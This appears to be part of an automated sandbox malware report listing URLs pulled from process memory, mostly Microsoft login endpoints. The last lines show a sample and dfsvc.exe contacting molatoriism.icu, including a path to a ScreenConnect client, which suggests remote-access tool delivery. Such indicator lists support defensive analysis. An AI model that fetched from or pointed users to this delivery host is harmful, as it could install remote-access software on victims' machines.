                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502118247.000001D224B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: svchost.exe, 00000003.00000003.2114884995.00000133B09A0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D2242A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logilive.com/ppsecure/InlineClient
                  Source: svchost.exe, 0000000D.00000003.2604999334.000001D225291000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf.srf
                  Source: svchost.exe, 0000000D.00000002.3887186855.000001D2242D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 0000000D.00000002.3887186855.000001D2242D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf$
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf0
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfD
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 0000000D.00000003.2677267062.000001D2242A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DncBP1eH7ECmgRuZSg991nNUauNrRrG3A4nY0k14
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 0000000D.00000003.2502200612.000001D224B6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3887830173.000001D225232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                  Source: svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                  Source: svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                  Source: svchost.exe, 0000000D.00000003.2502118247.000001D224B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                  Source: svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 0000000D.00000003.2501912233.000001D224B5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                  Source: svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502403168.000001D224B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502328594.000001D224B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501931391.000001D224B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                  Source: svchost.exe, 0000000D.00000002.3887123169.000001D2242B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf)%
                  Source: svchost.exe, 0000000D.00000002.3887830173.000001D225232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfc
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                  Source: svchost.exe, 0000000D.00000002.3888225184.000001D22527F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                  Source: svchost.exe, 0000000D.00000002.3888225184.000001D22527F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srfityCRL
                  Source: svchost.exe, 0000000D.00000003.2502094568.000001D224B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886798080.000001D22425F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502139880.000001D224B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfSt
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfToken
                  Source: svchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 0000000D.00000003.2501894009.000001D224B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                  Source: svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfh
                  Source: dfsvc.exe, 00000001.00000002.3912891196.000002356F43B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.ic
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350001A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350040E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350046F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu
                  Source: dfsvc.exe, 00000001.00000002.3917244971.0000023571713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/
                  Source: dfsvc.exe, 00000001.00000002.3886946834.000002350046F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.
                  Source: pzPO97QouM.exe, 00000000.00000002.3001524787.0000000000C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://molatoriism.icu/Bin/ScreenConnect.Client.applicatio
